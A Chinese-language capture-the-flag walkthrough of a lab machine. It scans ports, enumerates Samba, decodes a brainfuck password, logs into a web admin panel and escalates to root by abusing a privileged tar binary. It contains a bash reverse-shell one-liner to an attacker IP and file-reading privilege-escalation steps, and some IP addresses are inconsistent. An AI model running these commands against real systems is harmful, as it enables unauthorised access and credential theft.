先扫描主机(工具去我主页写的那个prime1(超超详细)里面有)
查了一下kali地址是192.168.59.162所以165就是靶机的地址
有了IP地址,接下来扫描靶机开启的端口以及对应的服务
nmap -sV -p- 192.168.59.165
//-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描
我们看到开放了80端口,尝试文件扫描命令
dirb http://192.168.95.130
由于kali扫描到的太多了,我这里用御剑工具扫的发现没有啥有用的
查看一下不同端口的功能,发现有两个登陆网站
80
10000
20000
枚举—— 利用Samba服务漏洞(文件共享服务可以使用 enum4linux 枚举信息)
Port 139 (TCP) - 文件和打印共享
Port 445 (TCP) - 实现Internet文件共享(NetBIOS服务在windos 2000及以后版本使用此端口)
enum4linux 192.168.59.165
发现有个cyber账号
查看80端口的源码,获得到密码
先得到了有加密特征(brainfuck)的密码
解密网址:http://esoteric.sange.fi/brainfuck/impl/interp/i.html
得到的结果是: .2uqPEfj3D<P'a-3
根据得到的账号密码尝试登录(10000/20000)
账号:cyber 密码:.2uqPEfj3D<P'a-3
发现只有20000可以登录
打开之后看不懂翻译了一下发现下面可以打开终端
成功获得第一个flag
传一个反弹shell
bash -i >/dev/tcp/192.168.133.131/9999 0>&1
Kali直接连接9999
可以连接成功
输入ls -l 可以看到对于tar其他用户权限是可读、可执行的
下一步提权
搜索敏感关键词:find / -name "*pass*" 找到关键文件
进到/var/backups
Ls -al
-a显示隐藏文件
可以发现这应该是一个密码的备份文件,并且是 root 用户以及组的,尝试使用 tar 压缩
先cd一下再用下面的命令
./tar -zcf yasuo.tar /var/backups/.old_pass.bak //回到家目录下使用
./tar -xvf yasuo.tar
cat var/backups/.old_pass.bak
获取到密码成功提权
在root家目录获取到第二个flag
总结
本靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权
使用 enum4linux 枚举信息
Brainfuck解密
webadmin 后台反弹 shell 提权
提权